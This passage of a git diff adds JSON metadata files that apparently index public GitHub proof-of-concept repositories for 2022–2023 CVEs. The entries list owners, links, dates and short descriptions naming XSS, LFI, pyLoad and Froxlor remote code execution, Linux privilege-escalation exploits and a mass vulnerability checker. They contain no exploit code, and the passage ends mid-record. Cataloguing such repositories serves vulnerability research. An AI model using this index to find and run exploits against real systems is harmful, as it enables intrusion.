b/2022/CVE-2022-48311.json @@ -0,0 +1,33 @@ +[ + { + "id": 598664381, + "name": "CVE-2022-48311", + "full_name": "swzhouu\/CVE-2022-48311", + "owner": { + "login": "swzhouu", + "id": 74352439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74352439?v=4", + "html_url": "https:\/\/github.com\/swzhouu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/swzhouu\/CVE-2022-48311", + "description": "HP Deskjet 2540 series printer Firmware Version CEP1FN1418BR and Product Model Number A9U23B HTTP configuration page Cross Site Scripting (XSS) Vulnerability", + "fork": false, + "created_at": "2023-02-07T15:13:33Z", + "updated_at": "2023-02-07T15:14:08Z", + "pushed_at": "2023-02-07T15:13:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-48429.json b/2022/CVE-2022-48429.json new file mode 100644 index 0000000000..4cf920f2bc --- /dev/null +++ b/2022/CVE-2022-48429.json @@ -0,0 +1,33 @@ +[ + { + "id": 636352279, + "name": "CVE-2022-48429_poc", + "full_name": "echo-devim\/CVE-2022-48429_poc", + "owner": { + "login": "echo-devim", + "id": 11312542, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11312542?v=4", + "html_url": "https:\/\/github.com\/echo-devim", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/echo-devim\/CVE-2022-48429_poc", + "description": "PoC for CVE-2022-48429 - Youtrack stored XSS", + "fork": false, + "created_at": "2023-05-04T16:55:20Z", + "updated_at": "2024-07-09T11:39:18Z", + "pushed_at": "2023-05-04T17:01:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-48474.json b/2022/CVE-2022-48474.json new file mode 100644 index 0000000000..cf8f863f5e --- /dev/null +++ b/2022/CVE-2022-48474.json @@ -0,0 +1,33 @@ +[ + { + "id": 629982721, + "name": "CVE-2022-48474_CVE-2022-48475", + "full_name": "sapellaniz\/CVE-2022-48474_CVE-2022-48475", + "owner": { + "login": "sapellaniz", + "id": 60947777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60947777?v=4", + "html_url": "https:\/\/github.com\/sapellaniz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sapellaniz\/CVE-2022-48474_CVE-2022-48475", + "description": "CVE-2022-48474 &CVE-2022-48475 PoCs & exploits ", + "fork": false, + "created_at": "2023-04-19T12:27:52Z", + "updated_at": "2024-07-15T20:18:17Z", + "pushed_at": "2023-04-19T12:50:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-48565.json b/2022/CVE-2022-48565.json new file mode 100644 index 0000000000..afdc6bbf16 --- /dev/null +++ b/2022/CVE-2022-48565.json @@ -0,0 +1,33 @@ +[ + { + "id": 876527302, + "name": "CVE-2022-48565-POC", + "full_name": "Einstein2150\/CVE-2022-48565-POC", + "owner": { + "login": "Einstein2150", + "id": 22019133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22019133?v=4", + "html_url": "https:\/\/github.com\/Einstein2150", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Einstein2150\/CVE-2022-48565-POC", + "description": "A proof-of-concept for CVE-2022-48565 - python plistlib XML deserialisation attack", + "fork": false, + "created_at": "2024-10-22T05:58:24Z", + "updated_at": "2024-11-13T13:42:39Z", + "pushed_at": "2024-10-28T16:07:13Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4896.json b/2022/CVE-2022-4896.json new file mode 100644 index 0000000000..83349c1a74 --- /dev/null +++ b/2022/CVE-2022-4896.json @@ -0,0 +1,33 @@ +[ + { + "id": 629992953, + "name": "CVE-2022-4896", + "full_name": "sapellaniz\/CVE-2022-4896", + "owner": { + "login": "sapellaniz", + "id": 60947777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60947777?v=4", + "html_url": "https:\/\/github.com\/sapellaniz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sapellaniz\/CVE-2022-4896", + "description": "CVE-2022-4896 PoCs & exploits ", + "fork": false, + "created_at": "2023-04-19T12:53:03Z", + "updated_at": "2023-04-19T12:55:00Z", + "pushed_at": "2023-04-19T12:54:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4939.json b/2022/CVE-2022-4939.json new file mode 100644 index 0000000000..e5670570b2 --- /dev/null +++ b/2022/CVE-2022-4939.json @@ -0,0 +1,33 @@ +[ + { + "id": 624443836, + "name": "PoC-CVE-2022-4939-", + "full_name": "BaconCriCRi\/PoC-CVE-2022-4939-", + "owner": { + "login": "BaconCriCRi", + "id": 130064933, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130064933?v=4", + "html_url": "https:\/\/github.com\/BaconCriCRi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BaconCriCRi\/PoC-CVE-2022-4939-", + "description": null, + "fork": false, + "created_at": "2023-04-06T13:34:09Z", + "updated_at": "2023-04-06T13:37:46Z", + "pushed_at": "2023-04-06T13:50:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4944.json b/2022/CVE-2022-4944.json new file mode 100644 index 0000000000..741ce22251 --- /dev/null +++ b/2022/CVE-2022-4944.json @@ -0,0 +1,33 @@ +[ + { + "id": 630962699, + "name": "CVE-2022-4944", + "full_name": "brosck\/CVE-2022-4944", + "owner": { + "login": "brosck", + "id": 71796063, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71796063?v=4", + "html_url": "https:\/\/github.com\/brosck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/brosck\/CVE-2022-4944", + "description": "「💥」CVE-2022-4944: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload", + "fork": false, + "created_at": "2023-04-21T15:09:37Z", + "updated_at": "2024-12-07T01:40:58Z", + "pushed_at": "2024-12-07T01:40:55Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0045.json b/2023/CVE-2023-0045.json new file mode 100644 index 0000000000..98c53e83e2 --- /dev/null +++ b/2023/CVE-2023-0045.json @@ -0,0 +1,64 @@ +[ + { + "id": 597559046, + "name": "CVE-2023-0045", + "full_name": "ASkyeye\/CVE-2023-0045", + "owner": { + "login": "ASkyeye", + "id": 50972716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50972716?v=4", + "html_url": "https:\/\/github.com\/ASkyeye", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ASkyeye\/CVE-2023-0045", + "description": null, + "fork": false, + "created_at": "2023-02-04T22:42:21Z", + "updated_at": "2024-10-16T23:27:28Z", + "pushed_at": "2023-02-03T22:22:52Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 598766898, + "name": "CVE-2023-0045", + "full_name": "es0j\/CVE-2023-0045", + "owner": { + "login": "es0j", + "id": 37257235, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37257235?v=4", + "html_url": "https:\/\/github.com\/es0j", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/es0j\/CVE-2023-0045", + "description": null, + "fork": false, + "created_at": "2023-02-07T19:12:41Z", + "updated_at": "2023-09-14T12:39:41Z", + "pushed_at": "2023-02-07T19:15:48Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 13, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0099.json b/2023/CVE-2023-0099.json new file mode 100644 index 0000000000..18c7038308 --- /dev/null +++ b/2023/CVE-2023-0099.json @@ -0,0 +1,33 @@ +[ + { + "id": 693003626, + "name": "CVE-2023-0099-exploit", + "full_name": "amirzargham\/CVE-2023-0099-exploit", + "owner": { + "login": "amirzargham", + "id": 133110721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/133110721?v=4", + "html_url": "https:\/\/github.com\/amirzargham", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/amirzargham\/CVE-2023-0099-exploit", + "description": "simple urls < 115 - Reflected XSS", + "fork": false, + "created_at": "2023-09-18T06:44:44Z", + "updated_at": "2024-01-12T02:47:49Z", + "pushed_at": "2024-02-10T05:04:22Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0156.json b/2023/CVE-2023-0156.json new file mode 100644 index 0000000000..2f46c4daba --- /dev/null +++ b/2023/CVE-2023-0156.json @@ -0,0 +1,33 @@ +[ + { + "id": 695786615, + "name": "CVE-2023-0156", + "full_name": "b0marek\/CVE-2023-0156", + "owner": { + "login": "b0marek", + "id": 144051679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4", + "html_url": "https:\/\/github.com\/b0marek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-0156", + "description": "Repository for CVE-2023-0156 vulnerability. ", + "fork": false, + "created_at": "2023-09-24T08:10:31Z", + "updated_at": "2023-09-24T08:10:31Z", + "pushed_at": "2023-09-24T08:17:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0157.json b/2023/CVE-2023-0157.json new file mode 100644 index 0000000000..df47a83efc --- /dev/null +++ b/2023/CVE-2023-0157.json @@ -0,0 +1,33 @@ +[ + { + "id": 695788809, + "name": "CVE-2023-0157", + "full_name": "b0marek\/CVE-2023-0157", + "owner": { + "login": "b0marek", + "id": 144051679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4", + "html_url": "https:\/\/github.com\/b0marek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-0157", + "description": "Repository for CVE-2023-0157 vulnerability. ", + "fork": false, + "created_at": "2023-09-24T08:20:30Z", + "updated_at": "2023-09-24T08:20:30Z", + "pushed_at": "2023-09-24T08:24:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0159.json b/2023/CVE-2023-0159.json new file mode 100644 index 0000000000..617013d333 --- /dev/null +++ b/2023/CVE-2023-0159.json @@ -0,0 +1,42 @@ +[ + { + "id": 690020929, + "name": "EVCer", + "full_name": "im-hanzou\/EVCer", + "owner": { + "login": "im-hanzou", + "id": 61415393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4", + "html_url": "https:\/\/github.com\/im-hanzou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/im-hanzou\/EVCer", + "description": "Automatic Mass Tool for checking vulnerability in CVE-2023-0159 - Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated LFI", + "fork": false, + "created_at": "2023-09-11T11:36:35Z", + "updated_at": "2023-09-23T08:46:32Z", + "pushed_at": "2023-09-11T12:18:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "automation", + "bash", + "checker", + "cve-2023-0159", + "exploit", + "wordpress", + "wordpress-plugin", + "wpbakery" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0179.json b/2023/CVE-2023-0179.json new file mode 100644 index 0000000000..53355eb24e --- /dev/null +++ b/2023/CVE-2023-0179.json @@ -0,0 +1,64 @@ +[ + { + "id": 591523271, + "name": "CVE-2023-0179-PoC", + "full_name": "TurtleARM\/CVE-2023-0179-PoC", + "owner": { + "login": "TurtleARM", + "id": 1218718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1218718?v=4", + "html_url": "https:\/\/github.com\/TurtleARM", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TurtleARM\/CVE-2023-0179-PoC", + "description": null, + "fork": false, + "created_at": "2023-01-21T01:02:01Z", + "updated_at": "2024-12-09T01:44:58Z", + "pushed_at": "2024-03-29T00:19:09Z", + "stargazers_count": 210, + "watchers_count": 210, + "has_discussions": false, + "forks_count": 34, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 34, + "watchers": 210, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 614641482, + "name": "CVE-2023-0179-PoC", + "full_name": "H4K6\/CVE-2023-0179-PoC", + "owner": { + "login": "H4K6", + "id": 83515195, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83515195?v=4", + "html_url": "https:\/\/github.com\/H4K6", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H4K6\/CVE-2023-0179-PoC", + "description": "针对(CVE-2023-0179)漏洞利用 该漏洞被分配为CVE-2023-0179,影响了从5.5到6.2-rc3的所有Linux版本,该漏洞在6.1.6上被测试。 漏洞的细节和文章可以在os-security上找到。", + "fork": false, + "created_at": "2023-03-16T02:20:52Z", + "updated_at": "2024-10-10T22:26:49Z", + "pushed_at": "2023-03-16T02:22:28Z", + "stargazers_count": 205, + "watchers_count": 205, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 205, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0264.json b/2023/CVE-2023-0264.json new file mode 100644 index 0000000000..6d9d15e7a2 --- /dev/null +++ b/2023/CVE-2023-0264.json @@ -0,0 +1,33 @@ +[ + { + "id": 610322253, + "name": "CVE-2023-0264", + "full_name": "twwd\/CVE-2023-0264", + "owner": { + "login": "twwd", + "id": 8222565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8222565?v=4", + "html_url": "https:\/\/github.com\/twwd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/twwd\/CVE-2023-0264", + "description": "A small PoC for the Keycloak vulnerability CVE-2023-0264", + "fork": false, + "created_at": "2023-03-06T14:42:19Z", + "updated_at": "2024-11-28T01:07:46Z", + "pushed_at": "2023-03-06T15:47:30Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0266.json b/2023/CVE-2023-0266.json new file mode 100644 index 0000000000..2be3d6b835 --- /dev/null +++ b/2023/CVE-2023-0266.json @@ -0,0 +1,33 @@ +[ + { + "id": 769797107, + "name": "claude_opus_cve_2023_0266", + "full_name": "SeanHeelan\/claude_opus_cve_2023_0266", + "owner": { + "login": "SeanHeelan", + "id": 1920339, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1920339?v=4", + "html_url": "https:\/\/github.com\/SeanHeelan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SeanHeelan\/claude_opus_cve_2023_0266", + "description": "Demo showing Claude Opus does not find CVE-2023-0266", + "fork": false, + "created_at": "2024-03-10T04:41:34Z", + "updated_at": "2024-05-20T22:14:44Z", + "pushed_at": "2024-03-19T14:18:20Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0297.json b/2023/CVE-2023-0297.json new file mode 100644 index 0000000000..b4a445a233 --- /dev/null +++ b/2023/CVE-2023-0297.json @@ -0,0 +1,188 @@ +[ + { + "id": 586854096, + "name": "CVE-2023-0297_Pre-auth_RCE_in_pyLoad", + "full_name": "bAuh0lz\/CVE-2023-0297_Pre-auth_RCE_in_pyLoad", + "owner": { + "login": "bAuh0lz", + "id": 15223611, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15223611?v=4", + "html_url": "https:\/\/github.com\/bAuh0lz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bAuh0lz\/CVE-2023-0297_Pre-auth_RCE_in_pyLoad", + "description": "CVE-2023-0297: The Story of Finding Pre-auth RCE in pyLoad", + "fork": false, + "created_at": "2023-01-09T11:44:09Z", + "updated_at": "2024-08-12T20:29:15Z", + "pushed_at": "2023-01-14T04:40:47Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 601937653, + "name": "CVE-2023-0297", + "full_name": "Small-ears\/CVE-2023-0297", + "owner": { + "login": "Small-ears", + "id": 56350031, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56350031?v=4", + "html_url": "https:\/\/github.com\/Small-ears", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Small-ears\/CVE-2023-0297", + "description": "poc", + "fork": false, + "created_at": "2023-02-15T06:28:40Z", + "updated_at": "2023-03-31T06:17:35Z", + "pushed_at": "2023-02-17T05:32:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 643598552, + "name": "CVE-2023-0297", + "full_name": "JacobEbben\/CVE-2023-0297", + "owner": { + "login": "JacobEbben", + "id": 112503338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4", + "html_url": "https:\/\/github.com\/JacobEbben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2023-0297", + "description": "Unauthenticated Remote Code Execution in PyLoad <0.5.0b3.dev31", + "fork": false, + "created_at": "2023-05-21T17:09:05Z", + "updated_at": "2024-11-27T17:39:12Z", + "pushed_at": "2023-05-21T17:15:18Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 654170026, + "name": "CVE-2023-0297", + "full_name": "overgrowncarrot1\/CVE-2023-0297", + "owner": { + "login": "overgrowncarrot1", + "id": 78485709, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78485709?v=4", + "html_url": "https:\/\/github.com\/overgrowncarrot1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/overgrowncarrot1\/CVE-2023-0297", + "description": null, + "fork": false, + "created_at": "2023-06-15T14:28:05Z", + "updated_at": "2023-09-03T21:03:02Z", + "pushed_at": "2023-06-15T14:35:24Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 857813726, + "name": "exploit_CVE-2023-0297", + "full_name": "btar1gan\/exploit_CVE-2023-0297", + "owner": { + "login": "btar1gan", + "id": 92728059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92728059?v=4", + "html_url": "https:\/\/github.com\/btar1gan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/btar1gan\/exploit_CVE-2023-0297", + "description": "New exploit for pyLoad v0.5.0 - Unauthenticated remote code excecution", + "fork": false, + "created_at": "2024-09-15T17:15:33Z", + "updated_at": "2024-09-15T17:19:52Z", + "pushed_at": "2024-09-15T17:18:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 867618979, + "name": "CVE-2023-0297", + "full_name": "S4MY9\/CVE-2023-0297", + "owner": { + "login": "S4MY9", + "id": 119887905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119887905?v=4", + "html_url": "https:\/\/github.com\/S4MY9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/S4MY9\/CVE-2023-0297", + "description": "RCE in pyload prior to 0.5.0b3.dev31.", + "fork": false, + "created_at": "2024-10-04T12:03:54Z", + "updated_at": "2024-10-04T12:09:24Z", + "pushed_at": "2024-10-04T12:09:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0315.json b/2023/CVE-2023-0315.json new file mode 100644 index 0000000000..91560029c9 --- /dev/null +++ b/2023/CVE-2023-0315.json @@ -0,0 +1,33 @@ +[ + { + "id": 594862535, + "name": "CVE-2023-0315", + "full_name": "mhaskar\/CVE-2023-0315", + "owner": { + "login": "mhaskar", + "id": 6861215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6861215?v=4", + "html_url": "https:\/\/github.com\/mhaskar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mhaskar\/CVE-2023-0315", + "description": "The official exploit for Froxlor Remote Code Execution CVE-2023-0315", + "fork": false, + "created_at": "2023-01-29T21:20:26Z", + "updated_at": "2024-10-14T21:55:53Z", + "pushed_at": "2023-01-29T21:23:58Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-0386.json b/2023/CVE-2023-0386.json new file mode 100644 index 0000000000..bad97c530e --- /dev/null +++ b/2023/CVE-2023-0386.json @@ -0,0 +1,376 @@ +[ + { + "id": 630377180, + "name": "CVE-2023-0386", + "full_name": "veritas501\/CVE-2023-0386", + "owner": { + "login": "veritas501", + "id": 25763545, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25763545?v=4", + "html_url": "https:\/\/github.com\/veritas501", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/veritas501\/CVE-2023-0386", + "description": null, + "fork": false, + "created_at": "2023-04-20T08:51:20Z", + "updated_at": "2024-06-07T14:56:32Z", + "pushed_at": "2023-04-20T08:52:29Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 636233940, + "name": "linux-4.19.72_CVE-2023-0386", + "full_name": "Satheesh575555\/linux-4.19.72_CVE-2023-0386", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/linux-4.19.72_CVE-2023-0386", + "description": null, + "fork": false, + "created_at": "2023-05-04T11:55:43Z", + "updated_at": "2023-06-01T06:17:17Z", + "pushed_at": "2023-05-04T12:37:07Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 636517717, + "name": "CVE-2023-0386", + "full_name": "xkaneiki\/CVE-2023-0386", + "owner": { + "login": "xkaneiki", + "id": 26479696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26479696?v=4", + "html_url": "https:\/\/github.com\/xkaneiki", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xkaneiki\/CVE-2023-0386", + "description": "CVE-2023-0386在ubuntu22.04上的提权", + "fork": false, + "created_at": "2023-05-05T03:02:13Z", + "updated_at": "2024-12-27T06:57:54Z", + "pushed_at": "2023-06-13T08:58:53Z", + "stargazers_count": 387, + "watchers_count": 387, + "has_discussions": false, + "forks_count": 64, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 64, + "watchers": 387, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 636975790, + "name": "CVE-2023-0386", + "full_name": "chenaotian\/CVE-2023-0386", + "owner": { + "login": "chenaotian", + "id": 86546351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86546351?v=4", + "html_url": "https:\/\/github.com\/chenaotian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chenaotian\/CVE-2023-0386", + "description": "CVE-2023-0386 analysis and Exp", + "fork": false, + "created_at": "2023-05-06T06:07:23Z", + "updated_at": "2025-01-07T00:20:14Z", + "pushed_at": "2023-05-06T06:19:25Z", + "stargazers_count": 118, + "watchers_count": 118, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 118, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 637591035, + "name": "CVE-2023-0386", + "full_name": "3yujw7njai\/CVE-2023-0386", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2023-0386", + "description": "CVE-2023-0386 EXP", + "fork": false, + "created_at": "2023-05-08T01:53:50Z", + "updated_at": "2023-12-08T03:39:45Z", + "pushed_at": "2023-05-08T01:57:12Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 638165405, + "name": "kernel_v4.19.72_CVE-2023-0386", + "full_name": "hshivhare67\/kernel_v4.19.72_CVE-2023-0386", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/kernel_v4.19.72_CVE-2023-0386", + "description": null, + "fork": false, + "created_at": "2023-05-09T08:11:58Z", + "updated_at": "2023-05-09T10:34:30Z", + "pushed_at": "2023-05-09T10:36:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + 